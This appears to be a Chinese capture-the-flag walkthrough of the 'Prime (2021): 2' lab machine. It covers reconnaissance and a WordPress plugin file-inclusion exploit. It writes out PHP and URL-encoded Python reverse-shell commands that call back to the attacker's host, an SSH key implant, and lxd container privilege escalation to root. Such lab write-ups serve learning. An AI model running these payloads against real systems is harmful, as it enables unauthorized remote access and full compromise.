当前位置: 首页 > news >正文

Prime (2021): 2

前言

这个靶机有亿点难,收获很多。打靶的时候,前面很顺,到创建ssh公钥之后就一点不会了。

1

01

arp扫描,发现有一个130,再查看端口
在这里插入图片描述
在这里插入图片描述
有22,80,129,445,10123
dirb扫描目录
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里的something里面有一个jarves,应该是用户名称
在这里插入图片描述
继续找,发现upload里有cmd,应该是利用这里上传shell
在这里插入图片描述

02

/wp有一个wordpress,去搜索知道是一个平台,我们可以用wpscan去扫描wordpress,翻LFI是一个本地文件包含漏洞,不知道怎么利用,看wp要利用这里的https://www.exploit-db.com/exploits/46537/

在这里插入图片描述
打开后,找到这一行
在这里插入图片描述
在这里插入图片描述
发现用户jarves
在这里插入图片描述

/server里有一个zip,去搜索了知道,这是gila cms,没什么用处
初步信息收集完成

2

再进行上传shell操作,因为,上文提到的php文件,我这里用php提权
在这里插入图片描述

php -r ‘$sock=fsockopen(“47.192.168.157.128”,2333);exec(“/bin/sh -i <&3 >&3 2>&3”);’

在这里插入图片描述

我这里失败了,换python试试

192.168.157.130/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=…/…/…/…/…/…/…/…/…/…/home/jarves/upload/shell.php&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.157.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27

在这里插入图片描述
再升级shell
在这里插入图片描述

去home目录查看信息,有jarves
在这里插入图片描述
tmp里没有东西可以利用
在这里插入图片描述
查看/var,var目录的详细信息
在这里插入图片描述

查看/var/www
在这里插入图片描述
在这里插入图片描述
找到root的密码:root
我这里想去ssh连接,发现密码不对
在这里插入图片描述

3

剩下的步骤基本是看wp
要先用两个工具smbclient和enum4linux
在这里插入图片描述
在这里插入图片描述
再创建ssh公钥
在这里插入图片描述

在这里插入图片描述
将id_rsa.pub复制到tmp目录下命名位authorized_keys
在这里插入图片描述
将authorized_keys上传到目标主机的.ssh目录下
在这里插入图片描述

然后使用ssh登录到目标主机

4

发现jarves还属于lxd组
在这里插入图片描述

从github下载构建好的Alpine,然后进行执行
在这里插入图片描述
接着我们将生成的文件上传至目标机器

wget http://192.168.157.130:7777/lxd-alpine-builder/alpine-v3.14-x86_64-20240410_1650.tar.gz

接着我们使用lxd进行初始化

​lxd init

在这里插入图片描述
导入镜像

lxc image import ./alpine-v3.14-x86_64-20240410_1650.tar.gz --alias myimage

进入到容器的命令行
在这里插入图片描述

lxc init myimage ignite -c security.privileged=true

lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true

lxc start ignite

lxc exec ignite /bin/sh

替换mnt/root目录下的authorized_keys文件
在这里插入图片描述

最后使用ssh连接拿到root权限

http://www.lryc.cn/news/335903.html

相关文章:

  • React 状态管理:安全高效地修改对象属性的 3 种方法
  • python实现pdf的页面替换
  • [AIGC] Java List和Map常用API以及其Python实现方式对照介绍
  • 零基础如何闯入IT的神秘大门?
  • java程序 .exe启动nginx防止重复启动,已解决
  • 二十一、Rust 反射 获取类型
  • Flutter Engine引擎概念
  • 【运行环境】加载资源的形式
  • 备战蓝桥杯Day40 - 第11届python组真题 - C跑步锻炼
  • 书生·浦语大模型第二期实战营第二课笔记和基础作业
  • 成功解决> 错误: 无效的源发行版:17
  • 深度剖析:网络安全中的红蓝对抗策略
  • Java异常处理之旅:解救迷失的程序员(二)
  • 网络安全介绍
  • 分享一个好看的APP下载分发页,App Store风格
  • C++ 获取数组大小、多维数组操作详解
  • 苹果电脑怎么彻底删除软件 苹果电脑卸载软件在哪里 cleanmymac x怎么卸载 mac废纸篓怎么删除
  • STM32F407 FSMC并口读取AD7606
  • WebGPU vs. 像素流
  • Windows下docker-compose部署DolphinScheduler
  • 微服务项目sc2024通用Base工程
  • git学习 1
  • HTML - 请你说一下如何阻止a标签跳转
  • 【CV】ORB算法
  • 【算法】Cordic算法的原理及matlab/verilog应用
  • QT:信号与槽
  • 以动态库链接库 .dll 探索结构体参数
  • vue快速入门(三)差值表达式
  • RabbitMQ的交换机与队列
  • Spring的 IOC和AOP编程思想